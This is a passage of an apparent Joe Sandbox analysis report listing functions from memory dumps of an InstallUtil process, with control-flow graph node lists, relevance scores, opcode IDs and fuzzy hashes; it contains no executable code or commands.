                                                                                                              • Source File: 00000008.00000002.1536161455.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_5fd0000_InstallUtil.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6160316575927005c398b63ee2e463af344eb4019301a6bb7e2d067f6bb8caef
                                                                                                              • Instruction ID: 53b2a5166ee6681a836262baf871775f696347c9c637fb799f7d9a920233c1dd
                                                                                                              • Opcode Fuzzy Hash: 6160316575927005c398b63ee2e463af344eb4019301a6bb7e2d067f6bb8caef
                                                                                                              • Instruction Fuzzy Hash: 0E53E831D10B1A8ADB11EF68C844AA9F7B1FF99300F55D79AE45867121FB70AAC4CF81
                                                                                                              Function 05FD3390 Relevance: 2.2, Instructions: 2210COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1536161455.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_5fd0000_InstallUtil.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6356303a32395895883284c9bcf7ca35be3eea7f26da50b0eae061345ba17914
                                                                                                              • Instruction ID: 33b5f3f0638ec3f0503f1893e409b528d89a8ed28395e8b58dcfd1de7e2d4bad
                                                                                                              • Opcode Fuzzy Hash: 6356303a32395895883284c9bcf7ca35be3eea7f26da50b0eae061345ba17914
                                                                                                              • Instruction Fuzzy Hash: D8233031D107198EDB11EF68C884AADF7B1FF99300F15C79AE458A7211EB70AAC5CB91
                                                                                                              Function 05FD88A8 Relevance: 1.9, Strings: 1, Instructions: 602COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1665 5fd88a8-5fd88c5 1666 5fd88c7-5fd88ca 1665->1666 1667 5fd88cc-5fd88e9 1666->1667 1668 5fd88ee-5fd88f1 1666->1668 1667->1668 1669 5fd8a07-5fd8a10 1668->1669 1670 5fd88f7-5fd88fa 1668->1670 1673 5fd8938-5fd8941 1669->1673 1674 5fd8a16 1669->1674 1671 5fd88fc-5fd890d 1670->1671 1672 5fd8912-5fd8915 1670->1672 1671->1672 1676 5fd891f-5fd8922 1672->1676 1677 5fd8917-5fd891a 1672->1677 1679 5fd8947-5fd8952 1673->1679 1680 5fd8a96-5fd8ac3 1673->1680 1678 5fd8a1b-5fd8a1e 1674->1678 1684 5fd8924-5fd8928 1676->1684 1685 5fd8933-5fd8936 1676->1685 1677->1676 1682 5fd8a2a-5fd8a2d 1678->1682 1683 5fd8a20-5fd8a23 1678->1683 1679->1680 1686 5fd8958-5fd8968 1679->1686 1705 5fd8acd-5fd8ad0 1680->1705 1693 5fd8a2f-5fd8a35 1682->1693 1694 5fd8a3a-5fd8a3d 1682->1694 1688 5fd8a59-5fd8a71 1683->1688 1689 5fd8a25 1683->1689 1690 5fd892e 1684->1690 1691 5fd8a88-5fd8a95 1684->1691 1685->1673 1695 5fd8977-5fd897a 1685->1695 1686->1680 1696 5fd896e-5fd8972 1686->1696 1701 5fd8a76-5fd8a78 1688->1701 1689->1682 1690->1685 1693->1694 1699 5fd8a3f-5fd8a4f 1694->1699 1700 5fd8a54-5fd8a57 1694->1700 1697 5fd897c-5fd897d 1695->1697 1698 5fd8982-5fd8985 1695->1698 1696->1695 1697->1698 1702 5fd8987-5fd899d 1698->1702 1703 5fd89a2-5fd89a5 1698->1703 1699->1700 1700->1688 1700->1701 1706 5fd8a7f-5fd8a82 1701->1706 1707 5fd8a7a 1701->1707 1702->1703 1708 5fd89af-5fd89b2 1703->1708 1709 5fd89a7-5fd89ac 1703->1709 1710 5fd8af2-5fd8af5 1705->1710 1711 5fd8ad2-5fd8ad6 1705->1711 1706->1666 1706->1691 1707->1706 1716 5fd89be-5fd89c1 1708->1716 1717 5fd89b4-5fd89bd 1708->1717 1709->1708 1713 5fd8af7-5fd8b01 1710->1713 1714 5fd8b06-5fd8b09 1710->1714 1718 5fd8adc-5fd8ae4 1711->1718 1719 5fd8bba-5fd8bc8 1711->1719 1713->1714 1720 5fd8b2b-5fd8b2e 1714->1720 1721 5fd8b0b-5fd8b0f 1714->1721 1722 5fd89d1-5fd89d4 1716->1722 1723 5fd89c3-5fd89ca 1716->1723 1718->1719 1724 5fd8aea-5fd8aed 1718->1724 1737 5fd8bca-5fd8bf4 1719->1737 1738 5fd8c21-5fd8c22 1719->1738 1727 5fd8b38-5fd8b3b 1720->1727 1728 5fd8b30-5fd8b37 1720->1728 1721->1719 1726 5fd8b15-5fd8b1d 1721->1726 1722->1683 1730 5fd89d6-5fd89d9 1722->1730 1723->1697 1729 5fd89cc 1723->1729 1724->1710 1726->1719 1732 5fd8b23-5fd8b26 1726->1732 1733 5fd8b3d-5fd8b44 1727->1733 1734 5fd8b4b-5fd8b4e 1727->1734 1729->1722 1735 5fd89db-5fd89f0 1730->1735 1736 5fd89f5-5fd89f8 1730->1736 1732->1720 1744 5fd8b46 1733->1744 1745 5fd8bb2-5fd8bb9 1733->1745 1746 5fd8b68-5fd8b6b 1734->1746 1747 5fd8b50-5fd8b54 1734->1747 1735->1736 1740 5fd89fa-5fd89ff 1736->1740 1741 5fd8a02-5fd8a05 1736->1741 1739 5fd8bf6-5fd8bf9 1737->1739 1742 5fd8fcb-5fd8fd2 1738->1742 1743 5fd8c24-5fd8c2c 1738->1743 1749 5fd8bfb-5fd8c02 1739->1749 1750 5fd8c07-5fd8c0a 1739->1750 1740->1741 1741->1669 1741->1678 1753 5fd8fd7-5fd8fd9 1742->1753 1754 5fd8c2d-5fd8c30 1743->1754 1744->1734 1751 5fd8b6d-5fd8b7e 1746->1751 1752 5fd8b83-5fd8b86 1746->1752 1747->1719 1755 5fd8b56-5fd8b5e 1747->1755 1749->1750 1756 5fd8c0c-5fd8c0f 1750->1756 1757 5fd8c84-5fd8e18 1750->1757 1751->1752 1760 5fd8b88-5fd8b8c 1752->1760 1761 5fd8ba0-5fd8ba2 1752->1761 1758 5fd8fdb 1753->1758 1759 5fd8fe0-5fd8fe3 1753->1759 1754->1757 1762 5fd8c32-5fd8c35 1754->1762 1755->1719 1763 5fd8b60-5fd8b63 1755->1763 1756->1754 1765 5fd8c11-5fd8c20 1756->1765 1816 5fd8e1e-5fd8e25 1757->1816 1817 5fd8f51-5fd8f64 1757->1817 1758->1759 1759->1739 1766 5fd8fe9-5fd8ff2 1759->1766 1760->1719 1767 5fd8b8e-5fd8b96 1760->1767 1768 5fd8ba9-5fd8bac 1761->1768 1769 5fd8ba4 1761->1769 1770 5fd8c37-5fd8c48 1762->1770 1771 5fd8c53-5fd8c56 1762->1771 1763->1746 1765->1738 1767->1719 1774 5fd8b98-5fd8b9b 1767->1774 1768->1705 1768->1745 1769->1768 1770->1742 1783 5fd8c4e 1770->1783 1772 5fd8c6e-5fd8c71 1771->1772 1773 5fd8c58-5fd8c6b 1771->1773 1776 5fd8c7b-5fd8c7e 1772->1776 1777 5fd8c73-5fd8c78 1772->1777 1774->1761 1776->1757 1781 5fd8f67-5fd8f6a 1776->1781 1777->1776 1784 5fd8f6c-5fd8f7d 1781->1784 1785 5fd8f88-5fd8f8b 1781->1785 1783->1771 1784->1765 1792 5fd8f83 1784->1792 1786 5fd8f8d-5fd8f9e 1785->1786 1787 5fd8fa5-5fd8fa8 1785->1787 1786->1742 1795 5fd8fa0 1786->1795 1790 5fd8faa-5fd8fbb 1787->1790 1791 5fd8fc6-5fd8fc9 1787->1791 1790->1773 1798 5fd8fc1 1790->1798 1791->1742 1791->1753 1792->1785 1795->1787 1798->1791 1818 5fd8ed9-5fd8ee0 1816->1818 1819 5fd8e2b-5fd8e5e 1816->1819 1818->1817 1821 5fd8ee2-5fd8f15 1818->1821 1830 5fd8e60 1819->1830 1831 5fd8e63-5fd8ea4 1819->1831 1832 5fd8f1a-5fd8f47 1821->1832 1833 5fd8f17 1821->1833 1830->1831 1841 5fd8ebc-5fd8ec3 1831->1841 1842 5fd8ea6-5fd8eb7 1831->1842 1832->1766 1832->1817 1833->1832 1844 5fd8ecb-5fd8ecd 1841->1844 1842->1766 1844->1766
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1536161455.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_5fd0000_InstallUtil.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $
                                                                                                              • API String ID: 0-3993045852
                                                                                                              • Opcode ID: 3e5669344dcc96f435fe37da4babfd86f568124d3b5ceea4656195c7034db2dd
                                                                                                              • Instruction ID: f8f39f98faf7588561a48fe8c8a70fbffd74da5422858e3a792c52b4999afcbb
                                                                                                              • Opcode Fuzzy Hash: 3e5669344dcc96f435fe37da4babfd86f568124d3b5ceea4656195c7034db2dd
                                                                                                              • Instruction Fuzzy Hash: EE22A171E002099FDB24DBA4C480BAEFBB3FF85350F288569D455AB345DA39DD41CBA1
                                                                                                              Function 05FD5988 Relevance: 1.0, Instructions: 1047COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1536161455.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_5fd0000_InstallUtil.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 55026517ea3192696f21cd60b9a32aceb8a8143c82f316198f783dccb8ff9abb
                                                                                                              • Instruction ID: 58babcabf279f4ed867ed020490390b5e2f138d6100594cced0c5bf11a1374d8
                                                                                                              • Opcode Fuzzy Hash: 55026517ea3192696f21cd60b9a32aceb8a8143c82f316198f783dccb8ff9abb
                                                                                                              • Instruction Fuzzy Hash: 47A20234A002088FDB64DB68C588B6DFBF2FB49314F5884A9E449EB255DB39EC85CF51
                                                                                                              Function 05FDE959 Relevance: .6, Instructions: 563COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1536161455.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_5fd0000_InstallUtil.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b86ca5d41870402460c6ac0a394ee3b878f28e02d707e5f2f0541de459d6a097
                                                                                                              • Instruction ID: 7b3a37b3e94e93b9b7589d8d2f00224ee2fec72bfdb9ca28293d7a676bd83dc9
                                                                                                              • Opcode Fuzzy Hash: b86ca5d41870402460c6ac0a394ee3b878f28e02d707e5f2f0541de459d6a097
                                                                                                              • Instruction Fuzzy Hash: C6223030E002098FEF24DB58D484BAEF7A7FB49310F288525E556DB395CA39EC81CB61
                                                                                                              Function 02564AC0 Relevance: .3, Instructions: 266COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1517162988.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2560000_InstallUtil.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4e411bc888978186b96d3196c2178877c2d4be315aa02a376c6fca8b7e8bf2e6
                                                                                                              • Instruction ID: 153bb03eebaebf2ebe32275217bba5e76c1798e2564925d0d0c7d49e5366dd2c
                                                                                                              • Opcode Fuzzy Hash: 4e411bc888978186b96d3196c2178877c2d4be315aa02a376c6fca8b7e8bf2e6
                                                                                                              • Instruction Fuzzy Hash: 4BB14B70E00209CFDB24CFA9D8897AEBFF2BF88314F148529D415A7394EB749881CB95
                                                                                                              Function 02563EA8 Relevance: .2, Instructions: 238COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1517162988.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2560000_InstallUtil.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d55dc50c838062ccc5641037c417b0dfb8ab38dea861393f8a2325986a97c534
                                                                                                              • Instruction ID: ab726fdd769236de836f04fa34e5b7048f722be6727053a0edfcda84cdeb1949
                                                                                                              • Opcode Fuzzy Hash: d55dc50c838062ccc5641037c417b0dfb8ab38dea861393f8a2325986a97c534
                                                                                                              • Instruction Fuzzy Hash: 2D916070E00359DFDB24CFA9C8897EEBBF2BF88714F148129E415AB294DB749885CB45
                                                                                                              Function 05FDC880 Relevance: 5.2, Strings: 4, Instructions: 230COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 388 5fdc880-5fdc8a5 389 5fdc8a7-5fdc8aa 388->389 390 5fdd168-5fdd16b 389->390 391 5fdc8b0-5fdc8c5 389->391 392 5fdd16d-5fdd18c 390->392 393 5fdd191-5fdd193 390->393 398 5fdc8dd-5fdc8f3 391->398 399 5fdc8c7-5fdc8cd 391->399 392->393 395 5fdd19a-5fdd19d 393->395 396 5fdd195 393->396 395->389 400 5fdd1a3-5fdd1ad 395->400 396->395 405 5fdc8fe-5fdc900 398->405 401 5fdc8cf 399->401 402 5fdc8d1-5fdc8d3 399->402 401->398 402->398 406 5fdc918-5fdc989 405->406 407 5fdc902-5fdc908 405->407 418 5fdc98b-5fdc9ae 406->418 419 5fdc9b5-5fdc9d1 406->419 408 5fdc90c-5fdc90e 407->408 409 5fdc90a 407->409 408->406 409->406 418->419 424 5fdc9fd-5fdca18 419->424 425 5fdc9d3-5fdc9f6 419->425 430 5fdca1a-5fdca3c 424->430 431 5fdca43-5fdca5e 424->431 425->424 430->431 436 5fdca60-5fdca7c 431->436 437 5fdca83-5fdca91 431->437 436->437 438 5fdcaa1-5fdcb1b 437->438 439 5fdca93-5fdca9c 437->439 445 5fdcb1d-5fdcb3b 438->445 446 5fdcb68-5fdcb7d 438->446 439->400 450 5fdcb3d-5fdcb4c 445->450 451 5fdcb57-5fdcb66 445->451 446->390 450->451 451->445 451->446
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1536161455.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_5fd0000_InstallUtil.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q$$q$$q$$q
                                                                                                              • API String ID: 0-4102054182
                                                                                                              • Opcode ID: b2090e7a49e2fbb001d4b1fa1797e5a4a1478380ef717b2cf4176b007e25032a
                                                                                                              • Instruction ID: 99df9fbe1d5f13fa5e05c13b82bd6aebb4d56d4fc5e14a19fe4f0868c3293a09
                                                                                                              • Opcode Fuzzy Hash: b2090e7a49e2fbb001d4b1fa1797e5a4a1478380ef717b2cf4176b007e25032a
                                                                                                              • Instruction Fuzzy Hash: F4914030F002198FDB64DB69D850B6EBBA7FF89300F148565D819DB348EA74DD45CB91
                                                                                                              Function 05FD7E80 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 454 5fd7e80-5fd7ea4 455 5fd7ea6-5fd7ea9 454->455 456 5fd7eab-5fd7ec5 455->456 457 5fd7eca-5fd7ecd 455->457 456->457 458 5fd85ac-5fd85ae 457->458 459 5fd7ed3-5fd7fcb 457->459 461 5fd85b5-5fd85b8 458->461 462 5fd85b0 458->462 477 5fd804e-5fd8055 459->477 478 5fd7fd1-5fd801e call 5fd8729 459->478 461->455 463 5fd85be-5fd85cb 461->463 462->461 479 5fd80d9-5fd80e2 477->479 480 5fd805b-5fd80cb 477->480 491 5fd8024-5fd8040 478->491 479->463 497 5fd80cd 480->497 498 5fd80d6 480->498 494 5fd804b 491->494 495 5fd8042 491->495 494->477 495->494 497->498 498->479
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1536161455.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_5fd0000_InstallUtil.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: fq$XPq$\Oq
                                                                                                              • API String ID: 0-132346853
                                                                                                              • Opcode ID: 79d186ac366b19eed88bf6b99fb378d37ac3c38280df8693751d8ac62d76d3bf
                                                                                                              • Instruction ID: 23d16f695bfeb9a2a162c4b2000b549a426520576b8b59478d2db9bcd424fac5
                                                                                                              • Opcode Fuzzy Hash: 79d186ac366b19eed88bf6b99fb378d37ac3c38280df8693751d8ac62d76d3bf
                                                                                                              • Instruction Fuzzy Hash: 83618070F002089FDB149BA9C855BAEBBF7FF88340F248429E506AB395DB755C41CB51
                                                                                                              Function 05FDC871 Relevance: 2.7, Strings: 2, Instructions: 157COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1144 5fdc871-5fdc8a5 1146 5fdc8a7-5fdc8aa 1144->1146 1147 5fdd168-5fdd16b 1146->1147 1148 5fdc8b0-5fdc8c5 1146->1148 1149 5fdd16d-5fdd18c 1147->1149 1150 5fdd191-5fdd193 1147->1150 1155 5fdc8dd-5fdc8f3 1148->1155 1156 5fdc8c7-5fdc8cd 1148->1156 1149->1150 1152 5fdd19a-5fdd19d 1150->1152 1153 5fdd195 1150->1153 1152->1146 1157 5fdd1a3-5fdd1ad 1152->1157 1153->1152 1162 5fdc8fe-5fdc900 1155->1162 1158 5fdc8cf 1156->1158 1159 5fdc8d1-5fdc8d3 1156->1159 1158->1155 1159->1155 1163 5fdc918-5fdc989 1162->1163 1164 5fdc902-5fdc908 1162->1164 1175 5fdc98b-5fdc9ae 1163->1175 1176 5fdc9b5-5fdc9d1 1163->1176 1165 5fdc90c-5fdc90e 1164->1165 1166 5fdc90a 1164->1166 1165->1163 1166->1163 1175->1176 1181 5fdc9fd-5fdca18 1176->1181 1182 5fdc9d3-5fdc9f6 1176->1182 1187 5fdca1a-5fdca3c 1181->1187 1188 5fdca43-5fdca5e 1181->1188 1182->1181 1187->1188 1193 5fdca60-5fdca7c 1188->1193 1194 5fdca83-5fdca91 1188->1194 1193->1194 1195 5fdcaa1-5fdcb1b 1194->1195 1196 5fdca93-5fdca9c 1194->1196 1202 5fdcb1d-5fdcb3b 1195->1202 1203 5fdcb68-5fdcb7d 1195->1203 1196->1157 1207 5fdcb3d-5fdcb4c 1202->1207 1208 5fdcb57-5fdcb66 1202->1208 1203->1147 1207->1208 1208->1202 1208->1203
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1536161455.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_5fd0000_InstallUtil.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $q$$q
                                                                                                              • API String ID: 0-3126353813
                                                                                                              • Opcode ID: d1baa9f9fb6a4433e19166b942875a87d0b7f5ff0af90dade1d40961764b3bb9
                                                                                                              • Instruction ID: 1a8667a78d217fe30ad99a791cff36be0d5ddc1c666c34904ddcc166612869c1
                                                                                                              • Opcode Fuzzy Hash: d1baa9f9fb6a4433e19166b942875a87d0b7f5ff0af90dade1d40961764b3bb9
                                                                                                              • Instruction Fuzzy Hash: 5A514D30B102049FDB54EB69D861B6EBBE7FF89300F148569D819DB348EA74DD42CBA1
                                                                                                              Function 05FD7E70 Relevance: 2.6, Strings: 2, Instructions: 140COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1211 5fd7e70-5fd7ea4 1213 5fd7ea6-5fd7ea9 1211->1213 1214 5fd7eab-5fd7ec5 1213->1214 1215 5fd7eca-5fd7ecd 1213->1215 1214->1215 1216 5fd85ac-5fd85ae 1215->1216 1217 5fd7ed3-5fd7fcb 1215->1217 1219 5fd85b5-5fd85b8 1216->1219 1220 5fd85b0 1216->1220 1235 5fd804e-5fd8055 1217->1235 1236 5fd7fd1-5fd801e call 5fd8729 1217->1236 1219->1213 1221 5fd85be-5fd85cb 1219->1221 1220->1219 1237 5fd80d9-5fd80e2 1235->1237 1238 5fd805b-5fd80cb 1235->1238 1249 5fd8024-5fd8040 1236->1249 1237->1221 1255 5fd80cd 1238->1255 1256 5fd80d6 1238->1256 1252 5fd804b 1249->1252 1253 5fd8042 1249->1253 1252->1235 1253->1252 1255->1256 1256->1237
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1536161455.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_5fd0000_InstallUtil.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: fq$XPq
                                                                                                              • API String ID: 0-3167736908
                                                                                                              • Opcode ID: 2bd89b82182bdc755bc6d0c0ac776de542f71854e8993ff47dffe3074f03e619
                                                                                                              • Instruction ID: 3011d4381404adf5a97fcf0e526519e12de9248ff12748f894abe631213cbb58
                                                                                                              • Opcode Fuzzy Hash: 2bd89b82182bdc755bc6d0c0ac776de542f71854e8993ff47dffe3074f03e619
                                                                                                              • Instruction Fuzzy Hash: EE516E70F002089FDB149BA9C855BAEBAF7FF88740F248529E106AB395DA759C01CB90
                                                                                                              Function 0256ED15 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1870 256ed15-256ed3f 1871 256ed41-256ed44 1870->1871 1872 256ed46-256ed72 1871->1872 1873 256ed77-256ed7a 1871->1873 1872->1873 1874 256ed7c-256ed98 1873->1874 1875 256ed9d-256eda0 1873->1875 1874->1875 1876 256eda2 1875->1876 1877 256edaf-256edb1 1875->1877 1881 256eda8-256edaa 1876->1881 1878 256edb3 1877->1878 1879 256edb8-256edbb 1877->1879 1878->1879 1879->1871 1882 256edbd-256edcc 1879->1882 1881->1877 1885 256edd2-256ee0b 1882->1885 1886 256ef51-256ef7b 1882->1886 1893 256ee0d-256ee17 1885->1893 1894 256ee59-256ee7d 1885->1894 1889 256ef7c 1886->1889 1889->1889 1897 256ee2f-256ee57 1893->1897 1898 256ee19-256ee1f 1893->1898 1900 256ee87-256ef4b 1894->1900 1901 256ee7f 1894->1901 1897->1893 1897->1894 1902 256ee23-256ee25 1898->1902 1903 256ee21 1898->1903 1900->1885 1900->1886 1901->1900 1902->1897 1903->1897
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1517162988.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2560000_InstallUtil.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: PHq
                                                                                                              • API String ID: 0-3820536768
                                                                                                              • Opcode ID: 829fa184f3c4b0f6ff14e379a83d8c3a2eed44c9ffd3981b82c5a623dfefa19f
                                                                                                              • Instruction ID: 673cb5d7c7ffb8d8f76d1b10a7f32a3a64bbc389f5256b2e6d446c919769628b
                                                                                                              • Opcode Fuzzy Hash: 829fa184f3c4b0f6ff14e379a83d8c3a2eed44c9ffd3981b82c5a623dfefa19f
                                                                                                              • Instruction Fuzzy Hash: 56418034A013099FDB25DFA5D459AAEBBB2FF85340F24492AD406EB240DB70ED46CB85
                                                                                                              Function 0256A9B0 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1943 256a9b0-256a9c4 1944 256a9c6-256a9c9 1943->1944 1945 256a9fc-256a9ff 1944->1945 1946 256a9cb-256a9df 1944->1946 1947 256aa13-256aa16 1945->1947 1948 256aa01-256aa08 1945->1948 1956 256a9e5 1946->1956 1957 256a9e1-256a9e3 1946->1957 1951 256aa26-256aa29 1947->1951 1952 256aa18 1947->1952 1949 256ab23-256ab29 1948->1949 1950 256aa0e 1948->1950 1950->1947 1954 256aa65-256aa67 1951->1954 1955 256aa2b-256aa60 1951->1955 1971 256aa18 call 256b720 1952->1971 1972 256aa18 call 256af3a 1952->1972 1960 256aa6e-256aa71 1954->1960 1961 256aa69 1954->1961 1955->1954 1958 256a9e8-256a9f7 1956->1958 1957->1958 1958->1945 1959 256aa1e-256aa21 1959->1951 1960->1944 1962 256aa77-256aa86 1960->1962 1961->1960 1965 256aab0-256aac5 1962->1965 1966 256aa88-256aa8b 1962->1966 1965->1949 1968 256aa93-256aaae 1966->1968 1968->1965 1968->1966 1971->1959 1972->1959
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1517162988.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2560000_InstallUtil.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LRq
                                                                                                              • API String ID: 0-3187445251
                                                                                                              • Opcode ID: eeab1d5b30f82f673df6a1b1f8b56db6ebed45e258cb200d365fff4d24efcb02
                                                                                                              • Instruction ID: 51199e0ffaa8e04ef38035b8a6ee403e7fa486fbec967bddf70f0845537d5486
                                                                                                              • Opcode Fuzzy Hash: eeab1d5b30f82f673df6a1b1f8b56db6ebed45e258cb200d365fff4d24efcb02
                                                                                                              • Instruction Fuzzy Hash: 8D315031E102099BDB14CFA9C5457AEBBB6FF85350F208526E802FB250EB71AD81CB54
                                                                                                              Function 0256A9A2 Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1517162988.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2560000_InstallUtil.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LRq
                                                                                                              • API String ID: 0-3187445251
                                                                                                              • Opcode ID: 0eb4638efd70aa9b73e92d9dd322eb45c252cbef0080a94256fe6328e59ea8d4
                                                                                                              • Instruction ID: da5c5dffa4f7559488b43652ae2ffe220b285c062d72d9b0dc32e5b0b74b1940
                                                                                                              • Opcode Fuzzy Hash: 0eb4638efd70aa9b73e92d9dd322eb45c252cbef0080a94256fe6328e59ea8d4
                                                                                                              • Instruction Fuzzy Hash: BB313030E106199FEB18DF68C5457AEBBB6FF45340F61852AE402F7251EB719D81CB44
                                                                                                              Function 02566BC8 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1517162988.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2560000_InstallUtil.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LRq
                                                                                                              • API String ID: 0-3187445251
                                                                                                              • Opcode ID: a72a987ced67902ec811833b0848e0a15419609d161da772db13b6687a1d60a6
                                                                                                              • Instruction ID: a6cd40637e47d78a310d9f37efad8751b5b53ed853045d67e516359fdcc3f0f7
                                                                                                              • Opcode Fuzzy Hash: a72a987ced67902ec811833b0848e0a15419609d161da772db13b6687a1d60a6
                                                                                                              • Instruction Fuzzy Hash: 45210132A002508FDB11EB79D4513AC7BB6EF86321B0146AAC016CB2E6DF388C07CB91
                                                                                                              Function 05FD7D69 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1536161455.0000000005FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FD0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
